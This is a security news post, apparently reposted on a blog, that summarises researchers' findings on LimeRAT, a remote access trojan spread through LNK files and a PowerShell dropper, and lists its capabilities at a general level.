LimeRAT leverages unique infection technique to defeat traditional security mechanisms – DigitalMunition




Cyber Attack | Data Breach algorithm, file, cyber, number, code, abstract, pattern, hackers, macro, bad, background, screenshot, matrix, design, more, isolated, javascript, hardware, red, asp, tech, light, finance, data, black, communications, technology, security, development, computer, modern, source, economic, progression, programmer, monitor, center, programming, color, editor, shell, frustrating, pixelated, encryption,

Published on April 10th, 2019 📆 | 3337 Views ⚑

0

LimeRAT leverages unique infection technique to defeat traditional security mechanisms

  • The whole infection process begins with an LNK file.
  • The malware is capable of registering itself as ‘Critical Process’ on the infected systems.

LimeRAT is a powerful Remote Administration Tool that is publicly available to any Internet user. However, lately, it has been found that cybercriminals are using a unique infection technique to spread the malicious sample without being detected by anti-virus software.

How does the infection process start - The whole infection process begins with an LNK file. It enables the attackers to download and run a PowerShell file named ‘rdp.ps1’ from a remote location. The retrieved PowerShell file is later used as a dropper in the second stage of the infection process.

“This script firstly retrieves the version of the Windows OS installed on the target machine using the “Get-WmiObject -Class Win32_OperatingSystem | Select-Object -ExpandProperty Version” command. Then, depending on the returned value, it runs a couple of privilege escalation exploits able to bypass the UAC (User Account Control) feature, a well-known security mechanism introduced since Vista to avoid unauthorized system configuration changes,” the Yoroi researchers wrote.

What are its capabilities - A close investigation by the researchers from Cybaze-Yoroi revealed that the malware is capable of registering itself as ‘Critical Process’ on the infected systems. And if the user tries to kill it, a Blue Screen of Death (BSoD) is displayed on the screen.

Besides this peculiar trick, the malware also includes a set of other dangerous capabilities such as:

  • USB drive propagation;
  • Infecting all files and folders on USB drives;
  • Using startup methods to evade detection;
  • Virtual machines and analysis box awareness to avoid detection;
  • Info-stealer and Crypto-stealer modules;
  • Keylogger module;
  • Backdoor and RDP access.

Upon successful installation, the malware’s command and control infrastructure abuse the Pastebin service to gain persistence on a victim’s system.

Source link

Download Premium WordPress Themes Free
Download WordPress Themes Free
Free Download WordPress Themes
Download Best WordPress Themes Free Download
online free course

Tagged with:



Leave a Reply ✍


loading...